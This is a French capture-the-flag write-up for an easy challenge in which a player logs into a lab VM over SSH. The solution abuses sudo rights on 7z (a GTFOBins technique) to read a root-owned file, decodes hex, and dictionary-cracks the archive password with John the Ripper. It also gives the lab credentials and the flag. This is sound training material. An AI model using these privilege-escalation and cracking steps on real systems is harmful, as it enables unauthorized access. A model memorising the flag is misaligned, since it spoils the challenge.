# WRITEUP Squadra Azzura

## Catégorie :

`Misc`

## Consigne :

```
Nous avons récupéré un fichier d'archive appartenant à notre collègue qui a quitté l'entreprise. Aidez-nous à retrouver l'information essentielle que contient ce fichier.

Démarrer un environnement virtuel. **Attention** : La durée de vie de l'environnement est limitée

Pour se connecter :

- `ssh gigiriva@<ip_portailvms>`
- `Password: gigiriva`

<div>
<button class="btn btn-info" onclick="window.open('/portailvms/32','_blank')" >Accéder au portail</button>
</div>
<p></p>

> Format du flag : fl@g{.....................}
```

## Pièce jointe :

```
Néant
```

## Serveur :

```
PortailVMS
```

## Points attribués :

```
easy
```

## Hint :

```
Néant
```

## Flag :

```
fl@g{ItalianGoleador}
```

## Solution :

Ce challenge va demander à l'utilisateur d'utiliser une élévation de droits pour lire un fichier, de convertir le contenu d'un fichier en binaire et de casser le mot de passe d'un fichier 7z.

On se connecte en ssh (remplacer l'adresse IP par celle allouée par le PortailVMS) :

```bash
$ ssh gigiriva@172.24.70.100
```

- Nous obtenons un shell dans le contexte de l'utilisateur GigiRiva

- Nous listons le contenu du répertoire

```bash
$ ls
```

- Nous lisons le contenu de l'unique fichier présent "ReadMe.txt"

```bash
$ cat ReadMe.txt
check /root/6470e394cbf6dab6a91682cc8585059b
```

- Nous listons les permissions SUDO disponibles

```bash
$ sudo -l
```

- Nous découvrons la possibilité d'exploiter 7z. Le site GTFObins nous indique que les droits SUDO sur 7z permettent de lire le contenu de n'importe quel fichier

```bash
$ sudo 7z a -ttar -an -so /root/6470e394cbf6dab6a91682cc8585059b | 7z e -ttar -si -so
```

- Nous copions le résultat obtenu sur notre machine

- L'exécution de la commande `file` sur le fichier nous indique qu'il contient des caractères ASCII qui ressemblent à de l'hexadecimal. Nous convertissons l'hexa en binaire.

```bash
$ xxd -r fichierhexa > fichierbinaire
```

- Une exécution de la commande `file` sur le fichier obtenu nous indique que nous avons obtenu un fichier **7z**. La tentative de décompression demande un mot de passe que nous ne possédons pas. Bruteforçons-le par dictionnaire !

```bash
$ 7z2john fichierbinaire > hash
$ john --wordlist=rockyou.txt hash
```

- Nous obtenons le mot de passe **FOOTBALL**

- Nous pouvons décompresser le fichier et obtenons le flag dans le fichier flag.txt

